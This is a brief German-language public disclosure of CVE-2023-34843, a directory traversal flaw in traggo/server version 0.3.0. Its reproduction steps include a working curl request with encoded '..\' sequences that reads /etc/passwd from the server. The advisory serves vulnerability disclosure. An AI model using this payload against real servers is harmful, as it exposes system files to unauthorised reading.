
Öffentliche Offenlegung für CVE-2023-34843.
CVE-2023-34843 Offenlegung
traggo/server Version 0.3.0 ist anfällig für Directory Traversal.
Schritte zur Reproduktion:
Installieren Sie traggo/server auf Ihrem Endpunkt/Server. https://traggo.net/install/
Senden Sie eine GET-Anfrage an die folgende URL. curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd
Zeigen Sie den Inhalt von /etc/passwd an.